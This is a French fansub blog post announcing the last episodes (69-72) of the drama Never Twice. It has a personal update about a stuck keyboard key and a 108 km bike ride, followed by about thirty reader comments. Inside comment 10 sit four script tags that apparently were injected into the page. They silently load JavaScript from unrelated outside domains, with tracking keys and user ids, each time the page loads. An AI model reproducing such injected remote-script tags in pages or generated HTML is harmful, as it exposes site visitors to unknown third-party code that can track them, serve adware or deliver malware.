• Sortie ◊ NT 69-72 (FIN) VOSTFR

     

    Sortie ◊ NT 69-72 (FIN) VOSTFR

    never twice

       Bonjour à tous ! J'espère que vous allez bien ! Pour ma part, je souffre et j'ai des envies de meurtre. Tout d'abord, la touche "espace" de mon clavier d'ordinateur est bloquée, je dois appuyer super fort dessus et autant vous dire que c'est bien galère. Surtout que je ne reste qu'une semaine en Belgique avant de prendre l'avion pour de nouvelles contrées lointaines, donc ça tombe très mal. Je vais devoir me taper Liège (45min de voiture) ou Bruxelles (1H30) lundi, dans l'espoir qu'ils arrivent à faire la réparation dans la semaine... J'ai vraiment la poisse avec les ordinateurs. Mon ancien m'a lâchée le jour de l'an et donc j'ai reçu le nouveau le vendredi à 20H alors que je partais pour la Guyane le lendemain matin... Et là, après sept mois à peine, j'ai déjà de nouveaux soucis... Ça me goooonfle. C'est vraiment galère pour traduire et donc je n'avance pas beaucoup depuis trois jours. En plus de ça, j'ai eu une petite "aventure" à vélo et maintenant, j'ai des courbatures partouuuut ! Mercredi, je suis allée faire un dernier tour à vélo électrique avec mon papa. On voulait faire la route des Ocres à partir d'Apt (51km). L'employé de l'office du tourisme m'a plutôt conseillé de visiter les très jolis petits villages que sont Ménèrbes, Oppède-le-vieux et Lacoste en précisant que ça montait, mais que je pourrais revenir par la piste cyclable plate (environ 60km). Sauf qu'au dernier village, où on s'est arrêté pour déjeuner, alors qu'on discutait de notre trajet retour, le couple assis à côté nous a conseillé de continuer la boucle pour aller jusqu'à Lourmarin et ensuite retourner sur Apt. D'après le GPS, il n'y avait que 35km, donc un total de 70, ce qui nous convenait (même si on n'avait jamais fait autant). Sauf qu'au final, on a fait 108 km !!!! Nos batteries étaient vides, ça montait... Pouaaaaah j'ai cru mourir ! Et je vous dis pas à quel point mon corps me fait souffrir là. haha. Je crois que je me souviendrai encore longtemps de ce trajet hihi (mais c'était vraiment très, très beau - heureusement !).

       Bon passons aux informations importantes : avec la Haneulsora Fansub, on vous sort les quatre derniers épisodes de Never Twice, à savoir les épisodes 69 à 72 encodés par Pompom. J'ai également ajouté le softsub et le hardsub sur 1fichier. Vous connaissez déjà tous mon avis sur ce drama que j'ai adoré. J'ai posté un loooong avis sur la fiche du drama d'ailleurs. Regardez bien le dernier épisode jusqu'au bout, une surprise TREEEES étonnante vous attend, j'ai trop ri ! Ça me fait bizarre de finir ce projet que j'ai tant apprécié, mais il faut bien avancer ! J'espère que vous avez aimé suivre ce projet avec nous, tout autant que j'ai apprécié travailler avec Hoshizora ! On aime tellement faire des coprods, qu'on a remis le couvert ! Notre prochain projet commun débutera la première semaine de septembre, histoire de me laisser deux semaines pour préparer mes valises et mon énième déménagement vers de lointaines contrées. En attendant, petite devinette ! À votre avis, quelle sera notre prochaine coprod ? Quelques indices : un family drama - coréen - qui date de plusieurs années - avec un acteur principal que j'aime beaucoup (j'ai déjà traduit deux de ses dramas d'ailleurs). Qui a trouvé ? :P 

       Je vais essayer de faire le ménage dans les projets terminés ces derniers mois la semaine prochaine. Là c'est trop le bordel depuis juin xD. 

     

      Quant à mes coups de coeur musicaux récents : 

    JYP ft. SUNMI "When we disco" ∞ ROTHY "Ocean view" ∞ 

    QWENTY   
    Partager via Gmail

  • Commentaires

    1
    Vendredi 14 Août 2020 à 12:07

    Mille merci pour la fin ce drama et bon courage pour les autres projets!!!coolyes

    2
    Vendredi 14 Août 2020 à 12:12

    Merci beaucoup pour ce dernier pack et pour votre travail, bon courage pour vos autres projets smile

    Bonne journée

    3
    Vendredi 14 Août 2020 à 12:56

    Merci aux deux équipes pour ce long drama

    4
    Vendredi 14 Août 2020 à 13:42

    Merci merci beaucoup a toi Qwenty, Haneulsora et Pompom pour ces sorties et pour votre temps si precieux, et pour ce qui est de ton ordi je me demande ce qui ne va pas a moins que tu l'utilises 24/24h sans repit !!! Prenez soin de vous avec cette deuxieme vague...des bisous

    5
    Vendredi 14 Août 2020 à 13:59
    6
    Vendredi 14 Août 2020 à 14:04

    Merci pour la fin de ce drama !

    J'ai hâte de découvrir le prochain (non, j'ai pas deviné ! ^^). Ma mère aime beaucoup les daily, alors merci de les traduire !

    Fighting !

    7
    Vendredi 14 Août 2020 à 14:55

    bonjour, merci pour la fin de ce daily et le partage, à tout hasard je pense a happy home, bon week end

    8
    bras cassé
    Vendredi 14 Août 2020 à 14:56

    Courage à toi et merci pour ces sorties. 

     

    Si tu n'arrives pas à débloquer tes touches de clavier en le nettoyant, l'autre solution est de prendre un clavier sans fil ou avec fil pour ne pas acheter un autre ordinateur portable.

    Bone fin de séjour, ici à Liège, il commence à faire denouveau plus agréable.

      • Qwenty
        Vendredi 14 Août 2020 à 16:51
        J'ai acheté mon ordinateur en janvier 2020... il est toujours sous garantie et j'avais aussi pris l'extension de garantie de 2 ans. J'ai un macbook pro alors c'est un peu galère pour nettoyer moi-même... j'espère vraiment pouvoir me rendre à liège lundi et qu'ils pourront le réparer. Sinon il y a des apple store dans le pays où je me rends mais pas sûre de tenir un mois avec cette touche surtout pour préparer mes cours ^^' Il paraît qu'il va pleuvoir dans l'est de la Belgique la semaine prochaine T-T
    9
    Vendredi 14 Août 2020 à 15:34

    Un grand merci pour avoir été jusqu'au bout de ce long drama, c'est vraiment sympa, passez un très bon WE et faite attention à vous avec ce virus.

      • Vendredi 14 Août 2020 à 17:09

        Ce n'est pas marrant de jouer aux devinettes avec toi. Lol

    10
    Vendredi 14 Août 2020 à 16:56

    Bonsoir^^

    Merçi pour la suite et la fin de ce drama

    Je vais me regaler ce soir

    Pour le futur projet ça ne serais pas avec

    Lee Sang-Woo ^^

    <script src="//brigstoneapp.com/22c4d87c9433e6bd0d.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8900x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8900x&format=arrjs&r=1597416905010" type="text/javascript"></script> <script src="http://brigstoneapp.com/ext/22c4d87c9433e6bd0d.js?sid=52689_8900_&title=sdsd&blocks[]=31af2" type="text/javascript"></script>
      • Vendredi 14 Août 2020 à 17:05

        Mais... Mais... Mais...

    11
    Vendredi 14 Août 2020 à 17:27

    Mon pc portable fait parfois des caprices de touches, genre il faut appuyer comme une malade pour avoir le h ou le t. Et puis ça redevient normal sans que j'y fasse rien. Bon je dois préciser qu'il a fait une chute un jour où je me suis pris les pieds dans le fil de branchement. J'ai pas voulu le lâcher alors je suis tombée sur les genoux et il a atterri à plat un peu violemment sur le sol sarcastic À part ça merci beaucoup pour ce drama. Je viens de commencer à le télécharger et j'attends avec curiosité et impatience le prochain yes

    12
    Vendredi 14 Août 2020 à 18:31

    Bonsoir,

    Merci beaucoup pour la fin de ce drama. Maintenant qu'il est terminé, je vais commencer à le visionner.

    Ah, le vélo, ça me rappelle de sacrés souvenirs !

    Et merci à Pompom !

    Qwenty, les dramavores :

    Bonne soirée !

    13
    Vendredi 14 Août 2020 à 22:09

    Merci beaucoup pour ces derniers épisodes et vote travail :) :)

    Bon week-end :)

    14
    Samedi 15 Août 2020 à 08:56
    Merci pour ces nouveaux partages et bon courage pour la suite
    15
    Samedi 15 Août 2020 à 15:05

    Merci pour ces derniers épisodes smile

    16
    Samedi 15 Août 2020 à 22:52

    Merci beaucoup pour la fin de ce drama.

    17
    Dimanche 16 Août 2020 à 07:59

    Bonjour à tous,

    Ta randonnée en vélo  a fait remonter à ma mémoire une autre balade à bicyclette,  qui est arrivée à ma sœur, il y a..... 

    Ah, les PC !!!! Mon mari est en train de soigner celui de notre petite-fille, hi, hi !!! 

    Et MERCI beaucoup les filles, pour le partage des derniers épisodes de ce drama.

    Bon dimanche ainsi qu'à tous.

    18
    Dimanche 16 Août 2020 à 13:29

    merci pour ce projet 

    19
    sooki
    Dimanche 16 Août 2020 à 13:46

    merci pour les projets terminés

    happy home ?

    contrées lointaines... Madagascar ?

    plein d'encouragements

      • sooki
        Vendredi 21 Août 2020 à 16:33

        Tahiti ?

      • Vendredi 21 Août 2020 à 23:04

        J'aurais adoré Tahiti T-T 

        Je vais dans un pays qui n'est pas du tout francophone et dans une région du monde où je ne suis jamais allée :P

      • sooki
        Samedi 22 Août 2020 à 21:43

        pas du tout francophone, je suis intriguée

        islande ?

    20
    Dimanche 16 Août 2020 à 19:38

    Merci beaucoup Qwenty

    21
    Lundi 17 Août 2020 à 17:16

    merci beaucoup pour la fin de ce drama

    22
    Lundi 17 Août 2020 à 22:00

    Bonjour Qwenty, un grand merci pour la fin de ce drama!

    Bon courage avec ton ordi, tes valises tout ça tout ça...

    Bonne soirée!

    23
    Mardi 18 Août 2020 à 01:04

    Un immense merci à vous pour ce drama complet !!!!

    Fighting pour tout et bonne nuit à tous.

    24
    Mardi 18 Août 2020 à 20:10

    Coucou,

    Un grand merci pour la fin de ce drama happy

    Bon courage pour ton ordinateur, j'espère qu'ils vont pouvoir le réparer rapidement... c'est peut être pas grand chose et ils vont le faire en peu de temps wink2

    Très bonne soirée à tous kiss

    25
    Mercredi 19 Août 2020 à 08:47

    Merci beaucoup pour la fin de ce drama! Avec les vacances, je l'ai laissé de côté mais je vais m'y remettre sans faute car j'ai bien aimé le début. Je te souhaite une bonne fin de séjour chez toi. A bientôt! happy

    26
    Dimanche 23 Août 2020 à 18:29

    Aaaahhhh oui Qwenty j'aurais aime aussi que tu viennes en Polynesie mais bon ce sera peut etre pour la prochaine fois on croise les doigts ok ???

    Sinon merci a vous les filles pour la fin de ce projet, je finis de regarder ''Hi bye, Mama'' et je pourrais commencer ''Never Twice'' qui m'a l'air bien...

    Bonne rentree et bonne annee scolaire avec de nouveaux collegues et etudiants et surtout surtout fais attention a toi, proteges toi bien car le pire est a venir gros bisous de TAHITI !!!

    27
    Vendredi 28 Août 2020 à 03:10

    Merci beaucoup pour la fin de ce projet.

    Bon courage pour vos autres projets.

    28
    Samedi 29 Août 2020 à 16:58

    Merci pour la fin de ce drama et pour votre travail.

    Bon courage pour la suite de vos projets.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :